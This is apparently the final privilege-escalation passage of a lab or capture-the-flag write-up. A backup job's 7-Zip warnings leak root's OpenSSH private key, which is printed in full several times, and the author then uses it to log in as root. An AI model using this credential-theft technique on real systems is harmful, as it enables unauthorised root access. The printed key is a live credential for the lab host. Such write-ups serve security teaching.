Open archive: /var/backups/project.zip
--
Path = /var/backups/project.zip
Type = zip
Physical Size = 54871391
Scanning the drive:
WARNING: No more files
-----BEGIN OPENSSH PRIVATE KEY-----
WARNING: No more files
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
WARNING: No more files
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi
WARNING: No more files
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3Q
WARNING: No more files
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1Wx1IT31xsmrbSY6vosAdQzGif553PTtDs
WARNING: No more files
H2sfTWZeFDLGmqMhrqDdAAAACnJvb3RAdXNhZ2UBAgM=
WARNING: No more files
-----END OPENSSH PRIVATE KEY-----
2984 folders, 17973 files, 114779094 bytes (110 MiB)
Updating archive: /var/backups/project.zip
Items to compress: 20957
Files read from disk: 17973
Archive size: 54871528 bytes (53 MiB)
Scan WARNINGS for files and folders:
-----BEGIN OPENSSH PRIVATE KEY----- : No more files
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW : No more files
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi : No more files
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3Q : No more files
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1Wx1IT31xsmrbSY6vosAdQzGif553PTtDs : No more files
H2sfTWZeFDLGmqMhrqDdAAAACnJvb3RAdXNhZ2UBAgM= : No more files
-----END OPENSSH PRIVATE KEY----- : No more files
----------------
Scan WARNINGS: 7
Copy the key lines (without the WARNING text) into a file id_rsa on Kali:
└─$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3Q
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1Wx1IT31xsmrbSY6vosAdQzGif553PTtDs
H2sfTWZeFDLGmqMhrqDdAAAACnJvb3RAdXNhZ2UBAgM=
-----END OPENSSH PRIVATE KEY-----
SSH in as root with the key (it must be mode 600 or ssh refuses to use it):
chmod 600 id_rsa
└─$ ssh root@10.10.11.18 -i id_rsa
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)
...[snip]...
Last login: Mon Apr 8 13:17:47 2024 from 10.10.14.40
root@usage:~# id
uid=0(root) gid=0(root) groups=0(root)